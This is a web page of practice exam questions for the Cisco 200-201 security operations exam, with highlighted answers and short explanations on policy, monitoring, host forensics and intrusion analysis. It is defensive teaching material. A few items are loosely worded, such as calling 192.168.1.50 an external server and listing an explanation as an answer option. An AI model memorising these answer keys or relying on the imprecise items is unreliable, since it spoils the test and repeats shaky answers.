Cisco · Free Practice Questions · Last reviewed May 2026
30real exam-style questions organised by domain, each with the correct answer highlighted and a plain-English explanation of why it's right — and why the others are wrong.
A security analyst discovers that an employee has been sharing login credentials with coworkers. Which policy violation is this?
Remote Access Policy violation
Incident Response Policy violation
Data Classification Policy violation
Acceptable Use Policy violation
Sharing credentials is a misuse of company resources, violating the Acceptable Use Policy.
A company wants to ensure that employees report security incidents immediately. Which policy element is most important to include?
Specify encryption standards for data at rest
List acceptable uses of company resources
Define mandatory reporting procedures and contact information
Clear procedures encourage timely reporting.
Require complex passwords for all accounts
An organization's security policy requires that all network traffic be inspected by an intrusion prevention system. However, encrypted traffic is bypassing inspection. Which change to the policy would best address this issue?
Allow encrypted traffic to bypass the IPS
Require all internal traffic to use unencrypted protocols
Implement SSL/TLS decryption at the network perimeter
Decryption enables the IPS to inspect encrypted payloads.
Exclude encrypted traffic from the security policy scope
A security policy states that user activity logs must be retained for at least one year. What is the primary purpose of this requirement?
To support forensic investigations of security incidents
Logs provide evidence for post-incident analysis.
To improve system performance through log analysis
To comply with regulatory requirements only
To enable real-time monitoring of user behavior
A security analyst notices that an employee is accessing the corporate network from an unauthorized device. According to the security policy, which action should the analyst take first?
Report the employee to human resources for disciplinary action
Ignore the incident because it is a minor violation
Disable the device's network access immediately
Immediate containment is a typical first step.
Update the security policy to allow personal devices
A security policy requires that all changes to firewall rules be approved by two administrators. This is an example of which security principle?
Need to know
Defense in depth
Separation of duties
Two-person rule prevents unauthorized changes.
Least privilege
Want more Security Policies and Procedures practice?
Practice this domainAn organization wants to classify data based on its sensitivity and impact if disclosed. Which security principle is being applied?
Defense in depth
Confidentiality, integrity, and availability (CIA)
Data classification directly supports confidentiality and integrity by applying appropriate controls.
Least privilege
Data loss prevention
A SOC analyst notices repeated failed login attempts from a single IP address against multiple user accounts. Which type of attack is most likely occurring?
Credential stuffing
Brute force attack
Password spraying
Password spraying tries a few common passwords across many accounts.
Man-in-the-middle attack
A security engineer is designing a network to prevent an attacker who gains access to a web server from easily pivoting to the internal database server. Which architecture best achieves this goal?
Place both servers on the internal network with host-based firewalls
Place the web server in a DMZ and the database server on the internal network, with a firewall blocking outbound traffic from DMZ to internal
DMZ isolates web server; blocking outbound from DMZ prevents pivot.
Use a VPN between the web server and database server
Place both servers on the same VLAN with a firewall between them
Which TWO security concepts are fundamental to the principle of least privilege? (Choose two.)
Role-based access control (RBAC)
RBAC implements least privilege by assigning permissions to roles.
Mandatory access control (MAC)
Need-to-know
Need-to-know restricts access to data required for tasks.
Separation of duties
Defense in depth
Which THREE are common indicators of a distributed denial-of-service (DDoS) attack? (Choose three.)
Slow network performance and service unavailability
Overwhelmed resources cause slowdowns.
A single IP address generating excessive traffic
High bandwidth consumption on the network link
DDoS floods the link with traffic.
Unusual traffic patterns from many different sources
Many sources indicate a distributed attack.
Encrypted traffic from a known malware C2 server
Which TWO are goals of a security operations center (SOC)? (Choose two.)
Continuous monitoring of security events
SOC monitors events 24/7.
Managing user passwords
Developing software applications
Performing penetration tests
Responding to security incidents
Incident response is a primary SOC role.
Want more Security Concepts practice?
Practice this domainAn analyst notices repeated failed SSH attempts from an external IP to a server. The analyst wants to quickly see all SSH-related events from that IP in the last hour. Which approach is most efficient?
Search the SIEM for events with destination port 22 and source IP.
Directly retrieves SSH events for that IP.
Review all firewall logs for the past hour.
Run a packet capture on the server's network interface.
Check the server's auth.log file manually.
A security team implements a network-based IPS. During testing, they find that legitimate traffic is frequently blocked. Which tuning approach should they prioritize?
Change the IPS to fail-open mode.
Increase the number of IPS sensors.
Disable or modify signatures causing false positives.
Directly addresses the root cause of legitimate traffic being blocked.
Reduce the IPS sensitivity level to lower.
An analyst is investigating a host that is beaconing to a known malicious domain every 60 seconds. The host also shows outbound connections to multiple IPs on port 443. To confirm the beaconing, which data source is most useful?
DNS logs from the internal DNS server.
NetFlow records from the border router.
Shows flow timestamps and destinations; reveals periodic connections.
Full packet capture of all outbound traffic.
Host-based firewall logs.
A SOC analyst receives an alert for 'Malware Detected' from an endpoint sensor. The analyst checks the endpoint and sees a file named 'invoice.exe' in the Downloads folder. What should the analyst do first?
Escalate to a senior analyst.
Run a full antivirus scan.
Isolate the host from the network.
Contains the threat and prevents spread.
Delete the file immediately.
A company uses a SIEM with correlation rules. They notice that a rule designed to detect brute-force attacks is not triggering even though failed logins are occurring. Which is the most likely cause?
The SIEM is receiving too many logs and dropping events.
The correlation rule threshold is set too high.
The number of failed attempts may be below the threshold.
The SIEM time zone is misconfigured.
The log source is not sending syslog data.
During an incident, an analyst needs to determine if a specific user account 'jsmith' was used from a remote IP during a breach window. Which log sources should the analyst check first?
NetFlow records from the core switch.
VPN concentrator logs.
File server audit logs.
Windows Security Event Logs (Event ID 4624, 4625).
Contains logon events with username and source IP.
Want more Security Monitoring practice?
Practice this domainA security analyst is investigating a host that is suspected of being used as a pivot point in a network intrusion. The analyst needs to identify which process initiated an outbound connection to a known malicious IP address. Which host-based analysis approach should the analyst use to correlate the network connection to the specific process?
Run 'netstat -b' on the Windows host to display active connections with the associated process executable.
The -b flag shows the binary involved in creating each connection, directly correlating the connection to the process.
Examine the Windows Firewall log to see the source and destination IP addresses and ports for outbound traffic.
Review Windows Security Event Log for Event ID 4688 (Process Creation) for the timeline of process starts.
Use PowerShell cmdlet 'Get-NetTCPConnection' to list current TCP connections and their states.
Refer to the exhibit. A security analyst is analyzing a Windows host that is communicating with an external server at 192.168.1.50. Based on the output, which process is likely malicious?
svchost.exe (PID 1420) because it is connecting to an external IP on port 80.
cmd.exe (PID 2568) because it could be used to launch other processes.
powershell.exe (PID 2792) because it has an established HTTPS connection to an external server.
PowerShell making an outbound HTTPS connection is atypical and often used for malicious purposes.
notepad.exe (PID 2344) because it is not expecting to make any network connections.
A security analyst is investigating a host that is suspected of being compromised. The analyst runs a series of commands to gather information. Which TWO of the following commands are most useful for collecting volatile data from a live Windows system? (Choose two.)
netstat -anob
Shows active network connections with associated process IDs and executables.
tasklist /svc
Lists processes and their services, crucial for identifying running malware.
dir /s C:\Windows\System32\config
wevtutil qe System /c:10
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Refer to the exhibit. A network analyst sees repeated denied attempts from host 10.0.0.2 to 10.0.0.1 on port 23. Based on the log, what type of activity is most likely occurring?
DNS amplification attack
ARP spoofing
Brute force attempt on Telnet service
Multiple connection attempts to port 23 (Telnet) from the same source indicate a brute force or scanning activity.
ICMP flood attack
A security analyst is responding to an incident on a critical Windows server that hosts a database application. The server is running Windows Server 2019 with all current patches. The analyst suspects that a remote attacker gained access and is using living-off-the-land binaries to move laterally. The analyst has captured a memory dump and a full disk image. The analyst needs to determine if the attacker used PowerShell to download additional tools. Which analysis step should the analyst perform first to identify PowerShell usage?
Examine the Windows Registry for Run keys to identify persistence mechanisms.
Parse PowerShell operational logs (Event ID 4104) to extract executed scripts and commands.
PowerShell ScriptBlock logging captures the full script content, directly showing attacker commands.
Review prefetch files (.pf) to determine when PowerShell was last executed.
Analyze network connection logs to identify outbound connections to known malicious IPs.
An analyst is investigating a host that is suspected of being compromised. The host's security logs show multiple failed login attempts followed by a successful login from an unusual IP address, and then a series of outbound connections to known malicious destinations. Which TWO actions should the analyst take immediately? (Choose two.)
Delete the malicious files found on the host
Isolate the host from the network
Isolating the host stops ongoing malicious activity and prevents lateral movement.
Collect a forensic image of the host's hard drive
A forensic image preserves volatile and non-volatile evidence for detailed analysis.
Reboot the host to clear any malware from memory
Run a full antivirus scan on the host
Want more Host-Based Analysis practice?
Practice this domainA security analyst reviews an alert from the IPS that shows a spike in TCP SYN packets from an external IP to multiple internal hosts on port 443. What is the most likely attack type?
SYN flood
A SYN flood sends many TCP SYN packets to exhaust resources.
Port scanning
Man-in-the-middle
DNS amplification
An analyst notices that a host is sending large amounts of data to an external IP address on TCP port 22 during non-business hours. What is the most likely activity?
Remote administration
DNS query
FTP file transfer
Data exfiltration via SSH
SSH on port 22 can be used to tunnel data out.
An analyst sees an alert: 'ET POLICY Outgoing HTTP Request with Suspicious User-Agent (Mozilla/5.0 compatible; MSIE 6.0; Windows NT 5.1)'. The source is an internal host that typically uses Windows 10. What should the analyst suspect?
The traffic is from a web proxy
The host is running Windows XP
The host is running a browser update
The traffic is likely generated by malware
Malware often uses old User-Agents to evade detection.
During an investigation, an analyst finds that an internal host has been communicating with a known malicious IP on port 445. Which protocol is most likely involved?
SSH
RDP
SMB
SMB uses port 445.
HTTP
An analyst reviews NetFlow data and sees a single internal IP communicating with many external IPs on port 53, each with small UDP packets. The internal host is not a DNS server. What is the most likely explanation?
The host is acting as a DNS server
The host is performing recursive DNS lookups
The host is the victim of a DNS amplification attack
The host's IP is spoofed as the source of queries to many open resolvers, causing replies to flood the host.
The host is scanning for open DNS resolvers
A security analyst detects a large number of TCP RST packets from a single external IP to various internal hosts. The internal hosts are not sending any corresponding packets. What is the most likely cause?
A denial-of-service attack is occurring
A TCP connection is being established
A port scan is in progress
A TCP reset attack is being performed
Forged RST packets terminate connections prematurely.
Want more Network Intrusion Analysis practice?
Practice this domainThe 200-201 exam has 95 questions and must be completed in 120 minutes. Cisco passing scores vary by exam version and are not always publicly listed. Check the official Cisco exam page before booking.
CLI output interpretation, network topology analysis, routing behaviour, switching concepts, troubleshooting, and configuration questions.
The exam covers 5 domains: Security Policies and Procedures, Security Concepts, Security Monitoring, Host-Based Analysis, Network Intrusion Analysis. Questions are weighted by domain — higher-weight domains appear more on your actual exam.
No. These are original exam-style practice questions written against the official Cisco 200-201 exam objectives. They are not copied from the real exam. Courseiva focuses on genuine understanding, not memorisation of braindumps.
Courseiva tracks your accuracy per domain and routes you toward weak areas automatically. Free, no account required.